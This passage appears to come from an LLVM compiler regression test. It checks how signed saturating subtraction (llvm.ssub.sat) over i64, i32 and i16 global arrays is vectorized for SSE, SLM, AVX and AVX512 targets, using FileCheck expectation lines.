; SLM-NEXT: [[A0:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 0), align 8
; SLM-NEXT: [[A1:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 1), align 8
; SLM-NEXT: [[A2:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 2), align 8
; SLM-NEXT: [[A3:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 3), align 8
; SLM-NEXT: [[A4:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 4), align 8
; SLM-NEXT: [[A5:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 5), align 8
; SLM-NEXT: [[A6:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 6), align 8
; SLM-NEXT: [[A7:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 7), align 8
; SLM-NEXT: [[B0:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 0), align 8
; SLM-NEXT: [[B1:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 1), align 8
; SLM-NEXT: [[B2:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 2), align 8
; SLM-NEXT: [[B3:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 3), align 8
; SLM-NEXT: [[B4:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 4), align 8
; SLM-NEXT: [[B5:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 5), align 8
; SLM-NEXT: [[B6:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 6), align 8
; SLM-NEXT: [[B7:%.*]] = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 7), align 8
; SLM-NEXT: [[R0:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A0]], i64 [[B0]])
; SLM-NEXT: [[R1:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A1]], i64 [[B1]])
; SLM-NEXT: [[R2:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A2]], i64 [[B2]])
; SLM-NEXT: [[R3:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A3]], i64 [[B3]])
; SLM-NEXT: [[R4:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A4]], i64 [[B4]])
; SLM-NEXT: [[R5:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A5]], i64 [[B5]])
; SLM-NEXT: [[R6:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A6]], i64 [[B6]])
; SLM-NEXT: [[R7:%.*]] = call i64 @llvm.ssub.sat.i64(i64 [[A7]], i64 [[B7]])
; SLM-NEXT: store i64 [[R0]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 0), align 8
; SLM-NEXT: store i64 [[R1]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 1), align 8
; SLM-NEXT: store i64 [[R2]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 2), align 8
; SLM-NEXT: store i64 [[R3]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 3), align 8
; SLM-NEXT: store i64 [[R4]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 4), align 8
; SLM-NEXT: store i64 [[R5]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 5), align 8
; SLM-NEXT: store i64 [[R6]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 6), align 8
; SLM-NEXT: store i64 [[R7]], i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 7), align 8
; SLM-NEXT: ret void
;
; AVX1-LABEL: @sub_v8i64(
; AVX1-NEXT: [[TMP1:%.*]] = load <2 x i64>, <2 x i64>* bitcast ([8 x i64]* @a64 to <2 x i64>*), align 8
; AVX1-NEXT: [[TMP2:%.*]] = load <2 x i64>, <2 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 2) to <2 x i64>*), align 8
; AVX1-NEXT: [[TMP3:%.*]] = load <2 x i64>, <2 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 4) to <2 x i64>*), align 8
; AVX1-NEXT: [[TMP4:%.*]] = load <2 x i64>, <2 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 6) to <2 x i64>*), align 8
; AVX1-NEXT: [[TMP5:%.*]] = load <2 x i64>, <2 x i64>* bitcast ([8 x i64]* @b64 to <2 x i64>*), align 8
; AVX1-NEXT: [[TMP6:%.*]] = load <2 x i64>, <2 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 2) to <2 x i64>*), align 8
; AVX1-NEXT: [[TMP7:%.*]] = load <2 x i64>, <2 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 4) to <2 x i64>*), align 8
; AVX1-NEXT: [[TMP8:%.*]] = load <2 x i64>, <2 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 6) to <2 x i64>*), align 8
; AVX1-NEXT: [[TMP9:%.*]] = call <2 x i64> @llvm.ssub.sat.v2i64(<2 x i64> [[TMP1]], <2 x i64> [[TMP5]])
; AVX1-NEXT: [[TMP10:%.*]] = call <2 x i64> @llvm.ssub.sat.v2i64(<2 x i64> [[TMP2]], <2 x i64> [[TMP6]])
; AVX1-NEXT: [[TMP11:%.*]] = call <2 x i64> @llvm.ssub.sat.v2i64(<2 x i64> [[TMP3]], <2 x i64> [[TMP7]])
; AVX1-NEXT: [[TMP12:%.*]] = call <2 x i64> @llvm.ssub.sat.v2i64(<2 x i64> [[TMP4]], <2 x i64> [[TMP8]])
; AVX1-NEXT: store <2 x i64> [[TMP9]], <2 x i64>* bitcast ([8 x i64]* @c64 to <2 x i64>*), align 8
; AVX1-NEXT: store <2 x i64> [[TMP10]], <2 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 2) to <2 x i64>*), align 8
; AVX1-NEXT: store <2 x i64> [[TMP11]], <2 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 4) to <2 x i64>*), align 8
; AVX1-NEXT: store <2 x i64> [[TMP12]], <2 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 6) to <2 x i64>*), align 8
; AVX1-NEXT: ret void
;
; AVX2-LABEL: @sub_v8i64(
; AVX2-NEXT: [[TMP1:%.*]] = load <4 x i64>, <4 x i64>* bitcast ([8 x i64]* @a64 to <4 x i64>*), align 8
; AVX2-NEXT: [[TMP2:%.*]] = load <4 x i64>, <4 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 4) to <4 x i64>*), align 8
; AVX2-NEXT: [[TMP3:%.*]] = load <4 x i64>, <4 x i64>* bitcast ([8 x i64]* @b64 to <4 x i64>*), align 8
; AVX2-NEXT: [[TMP4:%.*]] = load <4 x i64>, <4 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 4) to <4 x i64>*), align 8
; AVX2-NEXT: [[TMP5:%.*]] = call <4 x i64> @llvm.ssub.sat.v4i64(<4 x i64> [[TMP1]], <4 x i64> [[TMP3]])
; AVX2-NEXT: [[TMP6:%.*]] = call <4 x i64> @llvm.ssub.sat.v4i64(<4 x i64> [[TMP2]], <4 x i64> [[TMP4]])
; AVX2-NEXT: store <4 x i64> [[TMP5]], <4 x i64>* bitcast ([8 x i64]* @c64 to <4 x i64>*), align 8
; AVX2-NEXT: store <4 x i64> [[TMP6]], <4 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 4) to <4 x i64>*), align 8
; AVX2-NEXT: ret void
;
; AVX512-LABEL: @sub_v8i64(
; AVX512-NEXT: [[TMP1:%.*]] = load <8 x i64>, <8 x i64>* bitcast ([8 x i64]* @a64 to <8 x i64>*), align 8
; AVX512-NEXT: [[TMP2:%.*]] = load <8 x i64>, <8 x i64>* bitcast ([8 x i64]* @b64 to <8 x i64>*), align 8
; AVX512-NEXT: [[TMP3:%.*]] = call <8 x i64> @llvm.ssub.sat.v8i64(<8 x i64> [[TMP1]], <8 x i64> [[TMP2]])
; AVX512-NEXT: store <8 x i64> [[TMP3]], <8 x i64>* bitcast ([8 x i64]* @c64 to <8 x i64>*), align 8
; AVX512-NEXT: ret void
;
; AVX256BW-LABEL: @sub_v8i64(
; AVX256BW-NEXT: [[TMP1:%.*]] = load <4 x i64>, <4 x i64>* bitcast ([8 x i64]* @a64 to <4 x i64>*), align 8
; AVX256BW-NEXT: [[TMP2:%.*]] = load <4 x i64>, <4 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 4) to <4 x i64>*), align 8
; AVX256BW-NEXT: [[TMP3:%.*]] = load <4 x i64>, <4 x i64>* bitcast ([8 x i64]* @b64 to <4 x i64>*), align 8
; AVX256BW-NEXT: [[TMP4:%.*]] = load <4 x i64>, <4 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 4) to <4 x i64>*), align 8
; AVX256BW-NEXT: [[TMP5:%.*]] = call <4 x i64> @llvm.ssub.sat.v4i64(<4 x i64> [[TMP1]], <4 x i64> [[TMP3]])
; AVX256BW-NEXT: [[TMP6:%.*]] = call <4 x i64> @llvm.ssub.sat.v4i64(<4 x i64> [[TMP2]], <4 x i64> [[TMP4]])
; AVX256BW-NEXT: store <4 x i64> [[TMP5]], <4 x i64>* bitcast ([8 x i64]* @c64 to <4 x i64>*), align 8
; AVX256BW-NEXT: store <4 x i64> [[TMP6]], <4 x i64>* bitcast (i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 4) to <4 x i64>*), align 8
; AVX256BW-NEXT: ret void
;
%a0 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 0), align 8
%a1 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 1), align 8
%a2 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 2), align 8
%a3 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 3), align 8
%a4 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 4), align 8
%a5 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 5), align 8
%a6 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 6), align 8
%a7 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @a64, i32 0, i64 7), align 8
%b0 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 0), align 8
%b1 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 1), align 8
%b2 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 2), align 8
%b3 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 3), align 8
%b4 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 4), align 8
%b5 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 5), align 8
%b6 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 6), align 8
%b7 = load i64, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @b64, i32 0, i64 7), align 8
%r0 = call i64 @llvm.ssub.sat.i64(i64 %a0, i64 %b0)
%r1 = call i64 @llvm.ssub.sat.i64(i64 %a1, i64 %b1)
%r2 = call i64 @llvm.ssub.sat.i64(i64 %a2, i64 %b2)
%r3 = call i64 @llvm.ssub.sat.i64(i64 %a3, i64 %b3)
%r4 = call i64 @llvm.ssub.sat.i64(i64 %a4, i64 %b4)
%r5 = call i64 @llvm.ssub.sat.i64(i64 %a5, i64 %b5)
%r6 = call i64 @llvm.ssub.sat.i64(i64 %a6, i64 %b6)
%r7 = call i64 @llvm.ssub.sat.i64(i64 %a7, i64 %b7)
store i64 %r0, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 0), align 8
store i64 %r1, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 1), align 8
store i64 %r2, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 2), align 8
store i64 %r3, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 3), align 8
store i64 %r4, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 4), align 8
store i64 %r5, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 5), align 8
store i64 %r6, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 6), align 8
store i64 %r7, i64* getelementptr inbounds ([8 x i64], [8 x i64]* @c64, i32 0, i64 7), align 8
ret void
}
define void @sub_v16i32() {
; SSE-LABEL: @sub_v16i32(
; SSE-NEXT: [[TMP1:%.*]] = load <4 x i32>, <4 x i32>* bitcast ([16 x i32]* @a32 to <4 x i32>*), align 4
; SSE-NEXT: [[TMP2:%.*]] = load <4 x i32>, <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 4) to <4 x i32>*), align 4
; SSE-NEXT: [[TMP3:%.*]] = load <4 x i32>, <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 8) to <4 x i32>*), align 4
; SSE-NEXT: [[TMP4:%.*]] = load <4 x i32>, <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 12) to <4 x i32>*), align 4
; SSE-NEXT: [[TMP5:%.*]] = load <4 x i32>, <4 x i32>* bitcast ([16 x i32]* @b32 to <4 x i32>*), align 4
; SSE-NEXT: [[TMP6:%.*]] = load <4 x i32>, <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 4) to <4 x i32>*), align 4
; SSE-NEXT: [[TMP7:%.*]] = load <4 x i32>, <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 8) to <4 x i32>*), align 4
; SSE-NEXT: [[TMP8:%.*]] = load <4 x i32>, <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 12) to <4 x i32>*), align 4
; SSE-NEXT: [[TMP9:%.*]] = call <4 x i32> @llvm.ssub.sat.v4i32(<4 x i32> [[TMP1]], <4 x i32> [[TMP5]])
; SSE-NEXT: [[TMP10:%.*]] = call <4 x i32> @llvm.ssub.sat.v4i32(<4 x i32> [[TMP2]], <4 x i32> [[TMP6]])
; SSE-NEXT: [[TMP11:%.*]] = call <4 x i32> @llvm.ssub.sat.v4i32(<4 x i32> [[TMP3]], <4 x i32> [[TMP7]])
; SSE-NEXT: [[TMP12:%.*]] = call <4 x i32> @llvm.ssub.sat.v4i32(<4 x i32> [[TMP4]], <4 x i32> [[TMP8]])
; SSE-NEXT: store <4 x i32> [[TMP9]], <4 x i32>* bitcast ([16 x i32]* @c32 to <4 x i32>*), align 4
; SSE-NEXT: store <4 x i32> [[TMP10]], <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 4) to <4 x i32>*), align 4
; SSE-NEXT: store <4 x i32> [[TMP11]], <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 8) to <4 x i32>*), align 4
; SSE-NEXT: store <4 x i32> [[TMP12]], <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 12) to <4 x i32>*), align 4
; SSE-NEXT: ret void
;
; SLM-LABEL: @sub_v16i32(
; SLM-NEXT: [[TMP1:%.*]] = load <4 x i32>, <4 x i32>* bitcast ([16 x i32]* @a32 to <4 x i32>*), align 4
; SLM-NEXT: [[TMP2:%.*]] = load <4 x i32>, <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 4) to <4 x i32>*), align 4
; SLM-NEXT: [[TMP3:%.*]] = load <4 x i32>, <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 8) to <4 x i32>*), align 4
; SLM-NEXT: [[TMP4:%.*]] = load <4 x i32>, <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 12) to <4 x i32>*), align 4
; SLM-NEXT: [[TMP5:%.*]] = load <4 x i32>, <4 x i32>* bitcast ([16 x i32]* @b32 to <4 x i32>*), align 4
; SLM-NEXT: [[TMP6:%.*]] = load <4 x i32>, <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 4) to <4 x i32>*), align 4
; SLM-NEXT: [[TMP7:%.*]] = load <4 x i32>, <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 8) to <4 x i32>*), align 4
; SLM-NEXT: [[TMP8:%.*]] = load <4 x i32>, <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 12) to <4 x i32>*), align 4
; SLM-NEXT: [[TMP9:%.*]] = call <4 x i32> @llvm.ssub.sat.v4i32(<4 x i32> [[TMP1]], <4 x i32> [[TMP5]])
; SLM-NEXT: [[TMP10:%.*]] = call <4 x i32> @llvm.ssub.sat.v4i32(<4 x i32> [[TMP2]], <4 x i32> [[TMP6]])
; SLM-NEXT: [[TMP11:%.*]] = call <4 x i32> @llvm.ssub.sat.v4i32(<4 x i32> [[TMP3]], <4 x i32> [[TMP7]])
; SLM-NEXT: [[TMP12:%.*]] = call <4 x i32> @llvm.ssub.sat.v4i32(<4 x i32> [[TMP4]], <4 x i32> [[TMP8]])
; SLM-NEXT: store <4 x i32> [[TMP9]], <4 x i32>* bitcast ([16 x i32]* @c32 to <4 x i32>*), align 4
; SLM-NEXT: store <4 x i32> [[TMP10]], <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 4) to <4 x i32>*), align 4
; SLM-NEXT: store <4 x i32> [[TMP11]], <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 8) to <4 x i32>*), align 4
; SLM-NEXT: store <4 x i32> [[TMP12]], <4 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 12) to <4 x i32>*), align 4
; SLM-NEXT: ret void
;
; AVX-LABEL: @sub_v16i32(
; AVX-NEXT: [[TMP1:%.*]] = load <8 x i32>, <8 x i32>* bitcast ([16 x i32]* @a32 to <8 x i32>*), align 4
; AVX-NEXT: [[TMP2:%.*]] = load <8 x i32>, <8 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 8) to <8 x i32>*), align 4
; AVX-NEXT: [[TMP3:%.*]] = load <8 x i32>, <8 x i32>* bitcast ([16 x i32]* @b32 to <8 x i32>*), align 4
; AVX-NEXT: [[TMP4:%.*]] = load <8 x i32>, <8 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 8) to <8 x i32>*), align 4
; AVX-NEXT: [[TMP5:%.*]] = call <8 x i32> @llvm.ssub.sat.v8i32(<8 x i32> [[TMP1]], <8 x i32> [[TMP3]])
; AVX-NEXT: [[TMP6:%.*]] = call <8 x i32> @llvm.ssub.sat.v8i32(<8 x i32> [[TMP2]], <8 x i32> [[TMP4]])
; AVX-NEXT: store <8 x i32> [[TMP5]], <8 x i32>* bitcast ([16 x i32]* @c32 to <8 x i32>*), align 4
; AVX-NEXT: store <8 x i32> [[TMP6]], <8 x i32>* bitcast (i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 8) to <8 x i32>*), align 4
; AVX-NEXT: ret void
;
; AVX512-LABEL: @sub_v16i32(
; AVX512-NEXT: [[TMP1:%.*]] = load <16 x i32>, <16 x i32>* bitcast ([16 x i32]* @a32 to <16 x i32>*), align 4
; AVX512-NEXT: [[TMP2:%.*]] = load <16 x i32>, <16 x i32>* bitcast ([16 x i32]* @b32 to <16 x i32>*), align 4
; AVX512-NEXT: [[TMP3:%.*]] = call <16 x i32> @llvm.ssub.sat.v16i32(<16 x i32> [[TMP1]], <16 x i32> [[TMP2]])
; AVX512-NEXT: store <16 x i32> [[TMP3]], <16 x i32>* bitcast ([16 x i32]* @c32 to <16 x i32>*), align 4
; AVX512-NEXT: ret void
;
%a0 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 0 ), align 4
%a1 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 1 ), align 4
%a2 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 2 ), align 4
%a3 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 3 ), align 4
%a4 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 4 ), align 4
%a5 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 5 ), align 4
%a6 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 6 ), align 4
%a7 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 7 ), align 4
%a8 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 8 ), align 4
%a9 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 9 ), align 4
%a10 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 10), align 4
%a11 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 11), align 4
%a12 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 12), align 4
%a13 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 13), align 4
%a14 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 14), align 4
%a15 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @a32, i32 0, i64 15), align 4
%b0 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 0 ), align 4
%b1 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 1 ), align 4
%b2 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 2 ), align 4
%b3 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 3 ), align 4
%b4 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 4 ), align 4
%b5 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 5 ), align 4
%b6 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 6 ), align 4
%b7 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 7 ), align 4
%b8 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 8 ), align 4
%b9 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 9 ), align 4
%b10 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 10), align 4
%b11 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 11), align 4
%b12 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 12), align 4
%b13 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 13), align 4
%b14 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 14), align 4
%b15 = load i32, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @b32, i32 0, i64 15), align 4
%r0 = call i32 @llvm.ssub.sat.i32(i32 %a0 , i32 %b0 )
%r1 = call i32 @llvm.ssub.sat.i32(i32 %a1 , i32 %b1 )
%r2 = call i32 @llvm.ssub.sat.i32(i32 %a2 , i32 %b2 )
%r3 = call i32 @llvm.ssub.sat.i32(i32 %a3 , i32 %b3 )
%r4 = call i32 @llvm.ssub.sat.i32(i32 %a4 , i32 %b4 )
%r5 = call i32 @llvm.ssub.sat.i32(i32 %a5 , i32 %b5 )
%r6 = call i32 @llvm.ssub.sat.i32(i32 %a6 , i32 %b6 )
%r7 = call i32 @llvm.ssub.sat.i32(i32 %a7 , i32 %b7 )
%r8 = call i32 @llvm.ssub.sat.i32(i32 %a8 , i32 %b8 )
%r9 = call i32 @llvm.ssub.sat.i32(i32 %a9 , i32 %b9 )
%r10 = call i32 @llvm.ssub.sat.i32(i32 %a10, i32 %b10)
%r11 = call i32 @llvm.ssub.sat.i32(i32 %a11, i32 %b11)
%r12 = call i32 @llvm.ssub.sat.i32(i32 %a12, i32 %b12)
%r13 = call i32 @llvm.ssub.sat.i32(i32 %a13, i32 %b13)
%r14 = call i32 @llvm.ssub.sat.i32(i32 %a14, i32 %b14)
%r15 = call i32 @llvm.ssub.sat.i32(i32 %a15, i32 %b15)
store i32 %r0 , i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 0 ), align 4
store i32 %r1 , i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 1 ), align 4
store i32 %r2 , i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 2 ), align 4
store i32 %r3 , i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 3 ), align 4
store i32 %r4 , i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 4 ), align 4
store i32 %r5 , i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 5 ), align 4
store i32 %r6 , i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 6 ), align 4
store i32 %r7 , i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 7 ), align 4
store i32 %r8 , i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 8 ), align 4
store i32 %r9 , i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 9 ), align 4
store i32 %r10, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 10), align 4
store i32 %r11, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 11), align 4
store i32 %r12, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 12), align 4
store i32 %r13, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 13), align 4
store i32 %r14, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 14), align 4
store i32 %r15, i32* getelementptr inbounds ([16 x i32], [16 x i32]* @c32, i32 0, i64 15), align 4
ret void
}
define void @sub_v32i16() {
; SSE-LABEL: @sub_v32i16(
; SSE-NEXT: [[TMP1:%.*]] = load <8 x i16>, <8 x i16>* bitcast ([32 x i16]* @a16 to <8 x i16>*), align 2
; SSE-NEXT: [[TMP2:%.*]] = load <8 x i16>, <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 8) to <8 x i16>*), align 2
; SSE-NEXT: [[TMP3:%.*]] = load <8 x i16>, <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 16) to <8 x i16>*), align 2
; SSE-NEXT: [[TMP4:%.*]] = load <8 x i16>, <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 24) to <8 x i16>*), align 2
; SSE-NEXT: [[TMP5:%.*]] = load <8 x i16>, <8 x i16>* bitcast ([32 x i16]* @b16 to <8 x i16>*), align 2
; SSE-NEXT: [[TMP6:%.*]] = load <8 x i16>, <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 8) to <8 x i16>*), align 2
; SSE-NEXT: [[TMP7:%.*]] = load <8 x i16>, <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 16) to <8 x i16>*), align 2
